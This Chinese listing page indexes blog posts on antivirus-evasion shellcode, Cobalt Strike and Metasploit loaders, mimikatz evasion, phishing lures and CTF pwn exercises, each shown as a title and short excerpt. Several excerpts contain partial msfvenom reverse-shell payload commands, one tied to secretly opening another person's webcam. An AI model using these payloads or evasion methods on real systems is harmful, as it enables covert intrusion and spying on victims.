免杀Shellcode

Windows 内存漏洞缓解措施

Shellcode利用缓解GSGS又称栈COOKIE,主要是为了防御栈溢出,而且非常有效绕过1)使用栈中的数据结构进行绕过,典型的虚函数(对象)、数组、指针结构,COOKIE只对有字符缓冲区局部变量的函数进行防御
Flying ladybird·2023-09-30 05:04

【红队攻防】从零开始的木马免杀到上线

0、环境配置说明应该全部使用云服务器完整演示比较好,奈何太穷了买不起服务器,只能用本地环境演示。所需环境如下:系统环境:CentOS7,Windows10软件环境CobaltStrike4.7,ShellQMaker,360杀毒一、CobaltStrike环境配置CentOS7.8环境安装CobaltStrike必备工具安装yum-yinstalllrzsz,unzip上传文件解压然后切换至Cob
为赋新词强说愁·2023-09-30 03:35

免杀对抗-Nim语言免杀-加载工具+加载方式

Nim语言-加载工具-NimShellCodeLoader项目配置环境:1.下载Nim语言&配置bin目录环境变量链接:https://nim-lang.org/install_windows.html
xiaoheizi安全·2023-09-29 23:40

【安全研究】Linux后渗透常见后门驻留方式分析

又或者,在RedTeam拿下一台服务器,为达到长久控制的目的而专门定制持久化后门(免杀肯定是必须的)的前提下,他们会如何结合系统自身的某些特性,达到持久化控制的效果?
安全狗(safedog)·2023-09-29 07:55

免杀对抗-无文件落地&分离拆分-文本提取+加载器分离+参数协议化+图片隐写

无文件落地&分离拆分无文件落地&分离拆分其实就是内存免杀,内存免杀是将shellcode直接加载进内存,由于没有文件落地,因此可以绕过文件扫描策略的查杀。
xiaoheizi安全·2023-09-27 10:52

免杀对抗-内存加载-shellcode转换-UUID+MAC+IPV4

内存加载-UUID地址-ShellCode转换介绍:通用唯一识别码(UUID),是用于计算机体系中以识别信息数目的一个128位标识符,根据标准方法生成,不依赖中央机构的注册和分配,UUID具有唯一性。
xiaoheizi安全·2023-09-27 10:16

Golang基础之关键字

Type参考##https://blog.csdn.net/SHELLCODE_8BIT/article/details/122837699type有如下几种用法:定义结构体定义接口类型定义类型别名类型查询类型定义
叱咤少帅(少帅)·2023-09-26 22:42

免杀技术,你需要学习哪些内容

免杀技术,你需要学习哪些内容?什么是免杀免杀是指通过各种技术手段使恶意软件或病毒能够逃避杀毒软件的检测和阻止,成功地感染目标系统。
自饰者六便士·2023-09-26 17:21

认识ShellCode

1认识SHELLCODEshellcode的本质其实就是一段可以自主运行的代码。
凌木LSJ·2023-09-25 15:33

认识JSP webshell免杀

【virustotal】【D盾】【shellpub】接下来进行免杀免杀就是将这些被识别的特征进行替换,绕过,混淆和干扰。
凌木LSJ·2023-09-25 15:32

WAF Bypass及案例实战

1.2.1WAF指纹识别工具1.3绕WAF的多种方式2.SQLiBypass2.1Bypass思路2.1.1层面问题2.1.2HTTP问题2.2绕过分析2.2.1绕过方式2.2.2脚本编写3.一句话木马免杀
来日可期x·2023-09-25 03:20

免杀对抗-java语言-shellcode免杀-源码修改+打包exe

JAVA-ShellCode免杀-源码修改&打包EXEShellcode-生成/上线1.msf生成shellcode命令:msfvenom-pjava/meterpreter/reverse_tcpLHOST
xiaoheizi安全·2023-09-24 15:34

免杀对抗-PowerShell-混淆+分离

演示:PowerShell-生成和上线1.生成——启动cs,生成两种模式的powershell脚本文件模式:执行ps1文件上线命令模式:执行txt文件中的命令上线2.文件模式powershell执行——两种方法方法一:打开Win7以上自带的WindowsPowerShellISE来执行成功上线:方法二:打开命令行,启动PowerShell来执行命令:powershell命令:.\payload.p
xiaoheizi安全·2023-09-24 15:04

免杀对抗-C#+go语言-混淆+防反编译+分离

C#&NET-ShellCode-生成/上线一、生成:1.msf生成C#语言的shellcode命令:msfvenom-pwindows/x64/meterpreter/reverse_tcpLHOST
xiaoheizi安全·2023-09-24 15:03

恶意软件分析资料大合集

恶意软件集合匿名代理蜜罐恶意软件样本库开源威胁情报工具其他资源检测与分类在线扫描与沙盒域名分析浏览器恶意软件文档和Shellcode文件提取去混淆调试和逆向工程网络内存取证Windows神器存储和工作流杂项资源书籍
hacker鬼七·2023-09-24 10:21

黑客圈专业术语总结

1.POC、EXP、Payload与ShellcodePOC:全称’ProofofConcept',中文’概念验证’,常指一段漏洞证明的代码。
hacker鬼七·2023-09-24 09:51

CS 4.7 Stager 逆向及 Shellcode 重写

1.概述一直很想有一个自己的控,奈何实力不允许,CS仍然是目前市面上最好用的控,但是也被各大厂商盯得很紧,通过加载器的方式进行免杀效果有限,后来看到有人用go重写了CS的beacon,感觉这个思路很好,
小袁同学爱学习·2023-09-24 07:02

Rust免杀 Shellcode加载与混淆2

前言这是半年前我学习Rust和免杀时的一些记录,最近打开知识库看到了这篇半年前的笔记,并且发现我常逛的安全社区都比较少有人分享Rust以及Rust免杀的帖子,于是想着将这篇笔记分享出来供大家参考和指正。
小袁同学爱学习·2023-09-24 06:23

pwn — ret2shellcode

Ret2shellcode:按惯例检查保护,发现啥都没开用ida打开看main函数发现了gets和strncpy函数,将gets里的s的值存入了buf2题文中无system,无shellcode(据说是长成
YeeZi_·2023-09-24 03:16

Metasploit(二)

搜索带有0708字样的模块useexploit模块--使用模块showoptions–查看配置set…–设置配置check--漏洞检测(可省略)use–使用exploit模块攻击Metasploit生成shellcode
echokp·2023-09-23 15:56

网络安全(黑客技术)学习笔记

3.所需要的技术水平需要掌握的知识点偏多(举例):外围打点能力渗透漏洞挖掘流量分析代码审计逆向免杀4.国家政策环境对于国家与企业的地位愈发重要,没有网络安全就没有国
德西德西·2023-09-20 11:47

木马免杀之PE文件

对于此问题,打算开一个专题进行木马免杀的分析,先从最最重要的PE文件说起,要攻击Windows系统,如果不懂PE文件,面对杀毒软件,则只能束手就擒了。PE文件PE(PortableExec
无情剑客Burning·2023-09-20 03:40

渗透中 POC、EXP、Payload、Shellcode 的区别

渗透中PoC、Exp、Payload、Shellcode的区别不同含义:POC=ProofofConcept中文意思是“观点证明”。
Bulldozer Coder·2023-09-20 02:36

打开对方的电脑的摄像头

大家玩玩就好,有杀毒软件可能会被干掉,关于免杀方式有很多,请勿捉弄同学,谢谢msfvenom-pwindows/meterpreter/reverse_tcpLHOST=10.0.128.149LPORT
落幕_f94c·2023-09-19 14:39

Windows多种方式获取密码

后面一段时间直到hw结束,我打算把主要精力都放在免杀上面,不会点C真的寸步难行,或者就只能从go下手了0x01SSP记录明文密码SSP(SecuritySupportProvider)是一个用于实现身份验证的
book4yi·2023-09-19 08:11

免杀对抗-Python-混淆算法+反序列化-打包生成器-Pyinstall

Python-MSF/CS生成shellcode-上线cs上线1.生成shellcode-c或者python2.打开pycharm工具,创建一个py文件,将原生态执行代码复制进去shellcode执行代码
xiaoheizi安全·2023-09-18 00:25

【操作系统安全】_Win7&Win8系列提权漏洞

文章目录漏洞概述和复现复现环境复现过程管理员身份复现普通用户复现基础知识系统调用SSDT表和ShadowSSDT表和HalDispatchTable硬件抽象层调度表R3任意修改R0地址空间内存漏洞原理查看exp源代码漏洞分析利用漏洞写一段获取System进程令牌的shellcode
区块链市场观察家·2023-09-17 01:08

PowerShell脚本免杀/bypass/绕过杀毒软件,ReconFTW 漏洞扫描

PowerShell脚本免杀/bypass/绕过杀毒软件,ReconFTW漏洞扫描。
代码讲故事·2023-09-16 18:17

pwnable.kr之echo1

拖进IDA分析第一项选项对应的函数是echo1,该函数存在明显的栈溢出.echo1-2.JPGecho1-3.JPG如果checksec的话可以发现该elf缓解技术几乎没开,可以采用覆盖返回值+跳转到shellcode
hyrathon·2023-09-15 09:56

ProcDump+Mimikatz绕过杀毒软件抓密码

Mimikatz就会被检测为病毒,无法使用,而想要对Mimikatz进行二次开发或者免杀难度会比较大,那有办法去解决这个问题吗?
Xuno_·2023-09-13 02:33

内网渗透作业2(mimikatz、pwdump/procdump/LaZagne/nmap)

欢迎大家一起来Hacking水友攻防实验室学习,渗透测试,代码审计,免杀逆向,实战分享,靶场靶机,求关注(mimikatz、pwdump/procdump/LaZagne/nmap)很紧张很“充实”的培训
热热的雨夜·2023-09-13 02:31

几种姿势运行mimikatz

但是在实际的运用中,常常会遇到杀软的拦截,所以这里我借鉴网上的资料,进行复现学习,达到免杀绕过的目的。有些方式没有复现成功我就没有写出来了,有一些成功之后似乎也会被拦截了。
小晓晓晓林·2023-09-13 02:29

2.12 PE结构:实现PE字节注入

本章笔者将介绍一种通过Metasploit生成ShellCode并将其注入到特定PE文件内的Shell注入技术。
微软技术分享·2023-09-12 03:41

免杀对抗-ShellCode上线+回调编译执行+混淆变异算法

C/C++--ShellCode-免杀对抗介绍:shellcode是一段用于利用软件漏洞而执行的代码,shellcode为16进制的机器码,因为经常让攻击者获得shell而得名。
xiaoheizi安全·2023-09-11 10:48

我要学pwn.day12

ciscn_2019_n_5潜心修炼,从基础开始这是一道简单的编写shellcode解题流程1.查看文件$fileciscn_2019_n_5ciscn_2019_n_5:ELF64-bitLSBexecutable
名为逗比·2023-09-11 07:33

记一次内网实战之不会免杀(上)

本文作者:重生信安-nobgr前段时间看了一下内网渗透,所以想找个环境练习一下,恰好有个兄弟丢了个站点出来,一起“练习内网”,然后就开始了“实战代练”。由于“懒”,所以记录时间和截图有些是补的。0x00外网入口点打开站点(这里用baidu.com替代)看了看,左翻翻右翻翻能看到很明显的“注入”点。简单测试一下(and1=1、1=2),返回不一样,所以sqlmap一把梭。sqlmap-uhttps:
重生信息安全·2023-09-10 15:24

Flash钓鱼->CS上线(免杀过火绒、360等)

先看结果访问钓鱼页面:点击立即升级即把马儿下载下来了这个马儿是rar压缩的,做成的rar解压自启动,所以是个exe的文件,然后这里为了像一点,把图标给改了双击运行,查看效果:首先CS是没东西的解压路径现在也是没东西的(这里我把解压路径给改成了:C:\Windows\Temp执行路径为:C:\Windows\Temp\Flash.exe)双击砸门的flash文件马尔已上线--------------
鸡肋是鸡肋!·2023-09-10 08:04

Python绝技:运用Python成为顶级黑客

Python绝技:运用Python成为顶级黑客结合具体的场景和真实的案例,详述了Python在渗透测试、电子取证、网络流量分析、无线安全、网站中信息的自动抓取、病毒免杀等领域内所发挥的巨大作用。
『六道』·2023-09-09 22:28

一款内网信息收集利用工具

FuckDomainMini简介这是一款基于java开发Windows的内网信息收集、利用工具可以节省您的信息收集所花费的,又或者是做免杀所花费的时间现在这个版本是先行版本,目前先行版只有一个功能,更多的功能还在调试与开发中
HACK之道·2023-09-09 17:40

Python 源码混淆与加密

但在某些场景下,我们的源码是不想被别人看到的,例如开发商业软件、编写0day漏洞POC/EXP、免杀shellcode等。多人学习python,不知道从何学起。
早起的python·2023-09-08 20:48

ASCII码-shellcode的技巧

所以就简单记录一下工具怎么用吧https://github.com/TaQini/alpha3https://github.com/veritas501/ae64.githttps://github.com/rcx/shellcode_encoder
蚁景网络安全·2023-09-07 11:52

1.pwn基础总结

基本概念:●exploit●用于攻击的脚本与方案(通常缩写为exp)●payload●攻击载荷,是的目标进程被劫持控制流的数据●shellcode调用攻击目标的shell的代码(打开目标的shell),
爱码蔡蔡子·2023-09-04 08:05

蓝队追踪者工具TrackAttacker,以及免杀马生成工具

蓝队追踪者工具TrackAttacker,以及免杀马生成工具。做过防守的都知道大HW时的攻击IP量,那么对于这些攻击IP若一个个去溯源则显得效率低下,如果有个工具可以对这些IP做批量初筛是不是更好?
代码讲故事·2023-09-03 19:02

【PWN · 栈迁移】[BUUCTF]ciscn_2019_es_2

第一道栈迁移题目,跌跌撞撞理解了前言当前溢出可用空间比较少时(极端情况下仅能覆写ebp和ret),可以通过栈迁移的方式,扩大shellcode的容纳空间,其核心是将esp移动到一段shellocode开头
Mr_Fmnwon·2023-09-03 16:19

1.12 进程注入ShellCode套接字

在笔者前几篇文章中我们一直在探讨如何利用Metasploit这个渗透工具生成ShellCode以及如何将ShellCode注入到特定进程内,本章我们将自己实现一个正向ShellCodeShell,当进程被注入后
微软技术分享·2023-09-02 03:00

1.9 动态解密ShellCode反弹

利用动态解密执行技术可以实现免杀。当程序中使用了敏感的函数时,存在被杀的风险。通过将代码段中的代码进行加密,在需要时直
微软技术分享·2023-09-01 23:24

mimikatz免杀过360和火绒

1、免杀方式对mimikatz我们进行源码免杀。源码免杀只需要定位源码中的特征代码进行修改就可以达到预期的免杀效果。一般的定位特征码分为三种:定位倒代码上
zxl2605·2023-08-30 23:50

1.6 编写双管道ShellCode

此外,本文还将通过使用汇编语言一步步来实现这个可被注入的ShellCode后门,并以此提高代码通用性。最终,我们将通过一个实际的漏洞攻击场景来展示如何利用这个后门实现内存注入攻击。
微软技术分享·2023-08-30 15:11

shellcode编写

文章目录注意事项基础知识开始编写第一步初始化第二步实现其他函数动态调用第三部实现GetProcAddress和LoadLibraryA的动态调用获取kernel32.dll基址动态调用GetProcAddress实战CreateFileAMessageBoxA导出shellcode
天问_Herbert555·2023-08-29 13:50

3.2 定位shellcode

1、代码植入实验的反思在代码植入实验中,我们使用越界的字符完成控制返回地址后,将返回地址改为shellcode在内存中的起始地址。
PT_silver·2023-08-29 13:50
上一页 3 4 5 6 7 8 9 10 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他